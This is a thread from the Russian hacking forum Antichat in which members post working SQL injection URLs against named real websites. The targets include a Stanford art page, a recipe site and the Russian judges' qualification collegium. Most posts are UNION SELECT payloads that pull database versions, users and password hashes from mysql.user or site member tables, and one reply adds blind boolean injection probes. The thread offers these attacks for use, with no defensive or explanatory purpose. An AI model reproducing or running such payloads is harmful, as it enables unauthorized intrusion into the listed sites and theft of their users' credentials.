HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.01.2007, 23:38
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Код:
http://www.karlcore.com/articles/article.php?id=-1+union+select+1,2,USER(),4,VERSION(),6/*
 
Ответить с цитированием

  #2  
Старый 08.01.2007, 07:23
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
С нами: 10227581

Репутация: 175
По умолчанию

http://www.splav.kharkov.com/mat_start.php?name_id=-1+union+select+CHAR(207,208,197,194,197,196,32,204 ,197,196,194,197,196,33)/*

СтЭнфорд ))
http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14 ,15,password,17,18,19+from+mysql.user/*

http://atvmarket.ru/select.php?cat=-1+union+select+version(),3/*


http://www.ecoross.ru/persons.php?name_id=-1+union+select+user(),2,CHAR(198,232,240,232,237,2 38,226,241,234,232,233,32),4,5,6,7,8,9,10,11,12,13 ,14/*

http://mir-tech.ru/group.php?cat=-1+union+select+CHAR(193,229,199,239,192,237,210,23 8,194,251,201,32,204,224,195,224,199,232,205,33)/*

http://fanats.ru/?n_id=-1+union+select+1,2,email,555,5+from+user+limit+3,3/*


http://www.websib.ru/new_detail.php?new_id=-1+union+select+user,password,1+from+mysql.user/*

Последний раз редактировалось *D1VER; 09.01.2007 в 02:55..
 
Ответить с цитированием

  #3  
Старый 09.01.2007, 08:49
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

http://bbq-grilling-recipes.com/recipe.php?recipeid=-1+union+select+0,concat(userid,0x3a,login,0x3a,pas sword,0x3a,email)+from+users+limit+1,1/*


ps это двиг.
/siteadmin/addad.php?groupid=4

Последний раз редактировалось [ cash ]; 09.01.2007 в 09:37..
 
Ответить с цитированием

  #4  
Старый 09.01.2007, 16:20
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATA BASE(),USER(),9/*
помогите с table informations =(
 
Ответить с цитированием

  #5  
Старый 09.01.2007, 17:00
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами: 10223973

Репутация: 123
По умолчанию

http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),p asswd,char(58),PasswordSalt),4,5+from+smf_members/*
A-ONE
 
Ответить с цитированием

  #6  
Старый 09.01.2007, 19:30
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
С нами: 10539746

Репутация: 1276


По умолчанию

http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(

P.S. просто из-за внемательности
Цитата:
http://user.kz/files/cifry.php?sid=2+union+select+1,2,99999,4,5,7,8/*
вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!

Последний раз редактировалось DIAgen; 09.01.2007 в 20:38..
 
Ответить с цитированием

  #7  
Старый 09.01.2007, 20:36
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
С нами: 10957346

Репутация: 2727


По умолчанию

Цитата:
Сообщение от DIAgen  
http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(
перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #8  
Старый 09.01.2007, 21:20
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
С нами: 10539746

Репутация: 1276


По умолчанию

Цитата:
Сообщение от c411k  
перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)
НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html
 
Ответить с цитированием

  #9  
Старый 09.01.2007, 23:22
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
С нами: 10539746

Репутация: 1276


По умолчанию

Цитата:
http://keep4u.ru/album.php?view=-1'+union+select+1,2,322,4+from+mysql.user/*
Правда не чего интересно!
 
Ответить с цитированием

  #10  
Старый 10.01.2007, 00:47
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами: 10188326

Репутация: 1866


По умолчанию

http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password) using%20cp1251),2+from+mysql.user/*
Высшая квалификационная коллегия судей
Российской Федерации
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.